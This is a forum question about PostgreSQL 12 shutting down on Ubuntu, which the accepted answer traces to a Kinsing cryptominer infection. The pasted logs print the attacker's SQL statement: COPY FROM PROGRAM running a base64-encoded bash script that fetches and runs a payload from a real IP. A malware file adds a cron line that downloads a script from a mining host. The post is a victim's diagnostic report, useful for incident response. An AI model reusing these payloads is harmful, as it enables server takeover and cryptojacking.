# Postgresql 12 shuts down randomly

Tags: postgresql, database

I'm using ubuntu 18.04 and postgresql 12,
See journalctl below:

```
Dec 16 09:39:19 server sudo[55084]: postgres : TTY=unknown ; PWD=/var/lib/postgresql/12/main ; USER=root ; COMMAND=/usr/sbin/sysctl kernel.nmi_watchdog=0
    Dec 16 09:39:19 server sudo[55084]: pam_unix(sudo:session): session opened for user root by (uid=0)
    Dec 16 09:39:19 server sudo[55084]: pam_unix(sudo:session): session closed for user root
    Dec 16 09:39:24 server crontab[56537]: (postgres) LIST (postgres)
    Dec 16 09:39:24 server crontab[56539]: (postgres) REPLACE (postgres)
    Dec 16 09:39:24 server crontab[56543]: (postgres) LIST (postgres)
    Dec 16 09:39:24 server crontab[56545]: (postgres) REPLACE (postgres)
    Dec 16 09:39:24 server crontab[56547]: (postgres) LIST (postgres)
    Dec 16 09:39:24 server crontab[56550]: (postgres) LIST (postgres)
    Dec 16 09:39:24 server crontab[56552]: (postgres) REPLACE (postgres)
    Dec 16 09:39:24 server crontab[56553]: (postgres) LIST (postgres)
    Dec 16 09:39:24 server crontab[56555]: (postgres) REPLACE (postgres)
    Dec 16 09:39:24 server crontab[56556]: (postgres) LIST (postgres)
    Dec 16 09:39:24 server crontab[56558]: (postgres) REPLACE (postgres)
    Dec 16 09:39:24 server crontab[56559]: (postgres) LIST (postgres)
    Dec 16 09:39:24 server crontab[56561]: (postgres) REPLACE (postgres)
    Dec 16 09:39:24 server crontab[56562]: (postgres) LIST (postgres)
    Dec 16 09:39:24 server crontab[56564]: (postgres) REPLACE (postgres)
    Dec 16 09:39:24 server crontab[56565]: (postgres) LIST (postgres)
    Dec 16 09:39:24 server crontab[56567]: (postgres) REPLACE (postgres)
    Dec 16 09:39:24 server crontab[56568]: (postgres) LIST (postgres)
    Dec 16 09:39:24 server crontab[56570]: (postgres) REPLACE (postgres)
    Dec 16 09:39:24 server crontab[56571]: (postgres) LIST (postgres)
    Dec 16 09:39:24 server crontab[56573]: (postgres) REPLACE (postgres)
    Dec 16 09:39:24 server crontab[56574]: (postgres) LIST (postgres)
    Dec 16 09:39:24 server crontab[56576]: (postgres) REPLACE (postgres)
    Dec 16 09:39:24 server crontab[56577]: (postgres) LIST (postgres)
    Dec 16 09:39:24 server crontab[56579]: (postgres) REPLACE (postgres)
    Dec 16 09:39:24 server crontab[56580]: (postgres) LIST (postgres)
    Dec 16 09:39:24 server crontab[56582]: (postgres) REPLACE (postgres)
    Dec 16 09:39:24 server crontab[56583]: (postgres) LIST (postgres)
    Dec 16 09:39:24 server crontab[56585]: (postgres) REPLACE (postgres)
    Dec 16 09:39:24 server crontab[56586]: (postgres) LIST (postgres)
    Dec 16 09:39:24 server crontab[56588]: (postgres) REPLACE (postgres)
    Dec 16 09:39:24 server crontab[56589]: (postgres) LIST (postgres)
    Dec 16 09:39:24 server crontab[56591]: (postgres) REPLACE (postgres)
    Dec 16 09:39:24 server crontab[56592]: (postgres) LIST (postgres)
    Dec 16 09:39:24 server crontab[56594]: (postgres) REPLACE (postgres)
    Dec 16 09:39:24 server crontab[56595]: (postgres) LIST (postgres)
    Dec 16 09:39:24 server crontab[56597]: (postgres) REPLACE (postgres)
    Dec 16 09:39:24 server crontab[56598]: (postgres) LIST (postgres)
    Dec 16 09:39:24 server crontab[56600]: (postgres) REPLACE (postgres)
    Dec 16 09:39:24 server crontab[56601]: (postgres) LIST (postgres)
    Dec 16 09:39:24 server crontab[56603]: (postgres) REPLACE (postgres)
    Dec 16 09:39:24 server crontab[56604]: (postgres) LIST (postgres)
    Dec 16 09:39:24 server crontab[56606]: (postgres) REPLACE (postgres)
    Dec 16 09:39:24 server crontab[56607]: (postgres) LIST (postgres)
    Dec 16 09:39:24 server crontab[56609]: (postgres) REPLACE (postgres)
    Dec 16 09:39:24 server crontab[56610]: (postgres) LIST (postgres)
    Dec 16 09:39:24 server crontab[56612]: (postgres) REPLACE (postgres)
    Dec 16 09:39:24 server crontab[56613]: (postgres) LIST (postgres)
    Dec 16 09:39:24 server crontab[56615]: (postgres) REPLACE (postgres)
    Dec 16 09:39:24 server crontab[56616]: (postgres) LIST (postgres)
    Dec 16 09:39:24 server crontab[56618]: (postgres) REPLACE (postgres)
    Dec 16 09:39:24 server crontab[56619]: (postgres) LIST (postgres)
    Dec 16 09:39:24 server crontab[56621]: (postgres) REPLACE (postgres)
    Dec 16 09:39:24 server crontab[56622]: (postgres) LIST (postgres)
    Dec 16 09:39:24 server crontab[56624]: (postgres) REPLACE (postgres)
    Dec 16 09:39:24 server crontab[56625]: (postgres) LIST (postgres)
    Dec 16 09:39:24 server crontab[56627]: (postgres) REPLACE (postgres)
    Dec 16 09:39:24 server crontab[56628]: (postgres) LIST (postgres)
    Dec 16 09:39:24 server crontab[56630]: (postgres) REPLACE (postgres)
    Dec 16 09:39:24 server crontab[56631]: (postgres) LIST (postgres)
    Dec 16 09:39:24 server crontab[56633]: (postgres) REPLACE (postgres)
    Dec 16 09:39:24 server crontab[56634]: (postgres) LIST (postgres)
    Dec 16 09:39:24 server crontab[56636]: (postgres) REPLACE (postgres)
    Dec 16 09:39:24 server crontab[56637]: (postgres) LIST (postgres)
    Dec 16 09:39:24 server crontab[56639]: (postgres) REPLACE (postgres)
    Dec 16 09:39:24 server crontab[56640]: (postgres) LIST (postgres)
    Dec 16 09:39:24 server crontab[56642]: (postgres) REPLACE (postgres)
    Dec 16 09:39:24 server crontab[56643]: (postgres) LIST (postgres)
    Dec 16 09:39:24 server crontab[56645]: (postgres) REPLACE (postgres)
    Dec 16 09:39:24 server crontab[56646]: (postgres) LIST (postgres)
    Dec 16 09:39:24 server crontab[56648]: (postgres) REPLACE (postgres)
    Dec 16 09:39:24 server crontab[56649]: (postgres) LIST (postgres)
    Dec 16 09:39:24 server crontab[56651]: (postgres) REPLACE (postgres)
    Dec 16 09:39:24 server crontab[56652]: (postgres) LIST (postgres)
    Dec 16 09:39:25 server crontab[56654]: (postgres) REPLACE (postgres)
    Dec 16 09:39:25 server crontab[56655]: (postgres) LIST (postgres)
    Dec 16 09:39:25 server crontab[56657]: (postgres) REPLACE (postgres)
    Dec 16 09:39:25 server crontab[56658]: (postgres) LIST (postgres)
    Dec 16 09:39:25 server crontab[56660]: (postgres) REPLACE (postgres)
    Dec 16 09:39:25 server crontab[56661]: (postgres) LIST (postgres)
    Dec 16 09:39:25 server crontab[56663]: (postgres) REPLACE (postgres)
    Dec 16 09:39:25 server crontab[56664]: (postgres) LIST (postgres)
    Dec 16 09:39:25 server crontab[56666]: (postgres) REPLACE (postgres)
    Dec 16 09:39:25 server crontab[56667]: (postgres) LIST (postgres)
    Dec 16 09:39:25 server crontab[56669]: (postgres) REPLACE (postgres)
    Dec 16 09:39:25 server crontab[56670]: (postgres) LIST (postgres)
    Dec 16 09:39:25 server crontab[56672]: (postgres) REPLACE (postgres)
    Dec 16 09:39:25 server crontab[56673]: (postgres) LIST (postgres)
    Dec 16 09:39:25 server crontab[56675]: (postgres) REPLACE (postgres)
    Dec 16 09:39:25 server crontab[56676]: (postgres) LIST (postgres)
    Dec 16 09:39:25 server crontab[56678]: (postgres) REPLACE (postgres)
    Dec 16 09:39:25 server crontab[56679]: (postgres) LIST (postgres)
    Dec 16 09:39:25 server crontab[56681]: (postgres) REPLACE (postgres)
    Dec 16 09:39:25 server crontab[56682]: (postgres) LIST (postgres)
    Dec 16 09:39:25 server crontab[56684]: (postgres) REPLACE (postgres)
    Dec 16 09:39:25 server crontab[56685]: (postgres) LIST (postgres)
    Dec 16 09:39:25 server crontab[56687]: (postgres) REPLACE (postgres)
    Dec 16 09:39:25 server crontab[56688]: (postgres) LIST (postgres)
    Dec 16 09:39:25 server crontab[56690]: (postgres) REPLACE (postgres)
    Dec 16 09:39:25 server postgresql@12-main[56691]: Cluster is not running.
    Dec 16 09:39:25 server systemd[1]: postgresql@12-main.service: Control process exited, code=exited, status=2/INVALIDARGUMENT
    Dec 16 09:39:25 server systemd[1]: postgresql@12-main.service: Failed with result 'exit-code'.
```

Logs for this period:

```
rm: cannot remove '/var/log/syslog': Permission denied
chattr: Permission denied while setting flags on /tmp/
chattr: Permission denied while setting flags on /var/tmp/
chattr: Permission denied while setting flags on /var/spool/cron
chattr: Permission denied while setting flags on /etc/crontab
ERROR: You need to be root to run this script
Fatal: can't open lock file /run/xtables.lock: Permission denied
bash: line 12: /proc/sys/kernel/nmi_watchdog: Permission denied
bash: line 13: /etc/sysctl.conf: Permission denied
userdel: user 'akay' does not exist
userdel: user 'vfinder' does not exist
chattr: Permission denied while trying to stat /root/.ssh/
chattr: Permission denied while trying to stat /root/.ssh/authorized_keys
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
cat: /tmp/.X11-unix/01: No such file or directory
cat: /tmp/.X11-unix/11: No such file or directory
cat: /tmp/.X11-unix/22: No such file or directory
cat: /tmp/.pg_stat.0: No such file or directory
cat: /tmp/.pg_stat.1: No such file or directory
cat: /data/./oka.pid: No such file or directory
2021-12-16 09:39:20.212 +06 [54731] LOG:  received smart shutdown request
2021-12-16 09:39:20.222 +06 [54731] LOG:  background worker "logical replication launcher" (PID 54738) exited with exit code 1
grep: Trailing backslash
kill: (16): Operation not permitted
kill: (56000): No such process
kill: (56005): No such process
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Failed to stop c3pool_miner.service: Access denied
See system logs and 'systemctl status c3pool_miner.service' for details.
log_rot: no process found
chattr: No such file or directory while trying to stat /etc/ld.so.preload
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.1': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.2': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.3': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.1': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.2': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.3': No such file or directory
rm: cannot remove '/var/tmp/lib': No such file or directory
rm: cannot remove '/var/tmp/.lib': No such file or directory
chattr: No such file or directory while trying to stat /etc/ld.so.preload
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.1': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.2': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.3': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.1': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.2': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.3': No such file or directory
rm: cannot remove '/var/tmp/lib': No such file or directory
rm: cannot remove '/var/tmp/.lib': No such file or directory
chattr: No such file or directory while trying to stat /tmp/lok
chmod: cannot access '/tmp/lok': No such file or directory
bash: line 545: docker: command not found
bash: line 546: docker: command not found
bash: line 547: docker: command not found
bash: line 548: docker: command not found
bash: line 549: docker: command not found
bash: line 550: docker: command not found
bash: line 551: docker: command not found
bash: line 552: docker: command not found
bash: line 553: docker: command not found
bash: line 554: docker: command not found
bash: line 555: docker: command not found
bash: line 556: docker: command not found
bash: line 557: docker: command not found
bash: line 558: docker: command not found
bash: line 559: docker: command not found
bash: line 560: docker: command not found
bash: line 561: docker: command not found
bash: line 562: docker: command not found
bash: line 563: docker: command not found
bash: line 564: docker: command not found
bash: line 565: docker: command not found
bash: line 566: docker: command not found
bash: line 567: setenforce: command not found
bash: line 568: /etc/selinux/config: Permission denied
Failed to stop apparmor.service: Access denied
See system logs and 'systemctl status apparmor.service' for details.
Synchronizing state of apparmor.service with SysV service script with /lib/systemd/systemd-sysv-install.
Executing: /lib/systemd/systemd-sysv-install disable apparmor
Failed to reload daemon: Access denied
update-rc.d: error: Permission denied
Failed to stop aliyun.service.service: Access denied
See system logs and 'systemctl status aliyun.service.service' for details.
Failed to disable unit: Access denied
/tmp/kinsing is 648effa354b3cbaad87b45f48d59c616
2021-12-16 09:39:25.123 +06 [55065] postgres@postgres FATAL:  terminating connection due to administrator command
2021-12-16 09:39:25.123 +06 [55065] postgres@postgres CONTEXT:  COPY opwcztav, line 1: "kernel.nmi_watchdog = 0"
2021-12-16 09:39:25.123 +06 [55065] postgres@postgres STATEMENT:  DROP TABLE IF EXISTS OPWczTav;CREATE TABLE OPWczTav(cmd_output text);COPY OPWczTav FROM PROGRAM 'echo IyEvYmluL2Jhc2gKcGtpbGwgLWYgenN2Ywpwa2lsbCAtZiBwZGVmZW5kZXJkCnBraWxsIC1mIHVwZGF0ZWNoZWNrZXJkCgpmdW5jdGlvbiBfX2N1cmwoKSB7CiAgcmVhZCBwcm90byBzZXJ2ZXIgcGF0aCA8PDwkKGVjaG8gJHsxLy8vLyB9KQogIERPQz0vJHtwYXRoLy8gLy99CiAgSE9TVD0ke3NlcnZlci8vOip9CiAgUE9SVD0ke3NlcnZlci8vKjp9CiAgW1sgeCIke0hPU1R9IiA9PSB4IiR7UE9SVH0iIF1dICYmIFBPUlQ9ODAKCiAgZXhlYyAzPD4vZGV2L3RjcC8ke0hPU1R9LyRQT1JUCiAgZWNobyAtZW4gIkdFVCAke0RPQ30gSFRUUC8xLjBcclxuSG9zdDogJHtIT1NUfVxyXG5cclxuIiA+JjMKICAod2hpbGUgcmVhZCBsaW5lOyBkbwogICBbWyAiJGxpbmUiID09ICQnXHInIF1dICYmIGJyZWFrCiAgZG9uZSAmJiBjYXQpIDwmMwogIGV4ZWMgMz4mLQp9CgppZiBbIC14ICIkKGNvbW1hbmQgLXYgY3VybCkiIF07IHRoZW4KICBjdXJsIDE4NS4yNTAuMTQ4LjIxNy9wZy5zaHxiYXNoCmVsaWYgWyAteCAiJChjb21tYW5kIC12IHdnZXQpIiBdOyB0aGVuCiAgd2dldCAtcSAtTy0gMTg1LjI1MC4xNDguMjE3L3BnLnNofGJhc2gKZWxzZQogIF9fY3VybCBodHRwOi8vMTg1LjI1MC4xNDguMjE3L3BnMi5zaHxiYXNoCmZp|base64 -d|bash';SELECT * FROM OPWczTav;DROP TABLE IF EXISTS OPWczTav;
2021-12-16 09:39:25.142 +06 [54733] LOG:  shutting down
2021-12-16 09:39:25.167 +06 [54731] LOG:  database system is shut down
```

I scanned the system with ClamAV, it found a malware file in the path `/var/lib/postgresql/12/main/a`.
Its contents:

```
bind: Operation not permitted
cmd: echo "*/30 * * * * /var/lib/postgresql/12/main/./oka" > /tmp/a;echo "* */6 * * * wget -q -O- http://xmr.linux1213.ru:2019/back.sh | sh">> /tmp/a; crontab /tmp/a;rm -rf /tmp/a
moniter begin
connect failed, return: -1
```

is it a source of trouble?

Comment: Unfortunately there is nothing specific in the attached log. Could you look for the PostgreSQL logs in `/var/log` and [edit] your question to include any seemingly relevant lines from the time of the problem? When PostgreSQL shuts down “randomly” it’s generally due to something being corrupt or uncaught. The error log will explain exactly what 

Comment: What is this: `rm: cannot remove '/var/log/syslog'`? That's a core directory and should never be removed. `You need to be root to run this script`? What script? `Permission denied while trying to stat /root/.ssh/`? None of these are related to PostgreSQL. It sounds as though you (or someone/thing) else is trying to damage the installation ...

Comment: @matigo, yes, looks suspicious, but I haven't executed these commands and It's  not someone else's activity, maybe malicious script?

Comment: All I can do from this vantage point is guess, which does you no good. You will want to perform a full investigation of the server, though, particularly if it's accessible to the open Internet.

Answer (score 0, accepted):

Kinsing miner was the reason... After cleaning cron and malwares the problem is gone.